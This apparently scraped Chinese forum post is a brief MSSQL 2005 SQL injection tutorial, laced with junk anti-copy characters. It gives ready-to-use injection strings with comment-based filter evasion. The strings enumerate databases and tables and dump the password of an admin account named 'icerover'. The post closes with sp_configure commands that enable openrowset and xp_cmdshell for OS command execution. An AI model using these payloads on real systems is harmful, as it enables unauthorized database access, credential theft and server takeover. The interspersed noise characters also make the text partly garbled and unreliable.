8 ^0 E( N6 v6 V2 z! N9 h" Q, l0 O7 }3 C) L' [; n
w4 a( Z4 E8 q+ Y1 }; q' z[Copy to clipboard]CODE:- P. Y5 _$ w6 T
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
7 @" {( O* }3 h
. n# B0 N V8 Z1 ^8 V* x( U5 _爆表语句,somedb部份是所要列的数据库,红色数字1累加
% J) y G3 h" w& M, ]1 Y: f( B9 A+ d z, T* T. I4 e
. j4 c0 O1 N ]; F' W5 B+ S1 B3 V' A[Copy to clipboard]CODE:
H- v4 f/ @ E7 W7 ~" \+ X/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--% S2 ^* V8 T; D5 F- Y
- |2 o( k5 V( {6 P& B! Q! I
爆字段语句,爆表admin里user='icerover'的密码段
% A/ w% ^! j& v8 h. u$ c2 ~- B O# k+ L B H" O
. \ h: w. E4 p# Q* X[Copy to clipboard]CODE:
( N6 H0 r K- X- t: a**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--1 ~1 F" o; Z: o B
+ K1 }4 `1 c# [1 ~
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
1 c) y* w+ H$ W4 ~2 N" Q如果是sa权限,可以这样来开启& t6 f" `+ k: b
开启openrowset
/ Z: [1 ^8 D4 o: c2 ~& {, x6 @: ~
( a8 c3 [/ R7 l2 C0 |6 w0 x( j[Copy to clipboard]CODE:
' N6 H8 L0 ?6 H& \$ R/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--/ ^3 a, ~% {( H9 `- Z! j8 o
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--/ [" Y* c8 B: S% N( ?! g* G
- X& C. t7 K( T4 ^- q
开启xp_cmdshell
, Y/ w8 d# y7 P: o" ]( M k: K. w/ s. X
$ b2 a$ n5 [( S- D3 u( e% [
[Copy to clipboard]CODE:, n4 R% i! w% e* [! X
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--2 x! O9 m( r; |9 y
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--) d7 |0 Y! b2 F6 ?5 }3 u1 v' G3 I2 P
/ M, c( ~. i$ o L" Nok,over~~晚安5 P" ~" n! q( I$ d, p) t, p' N
|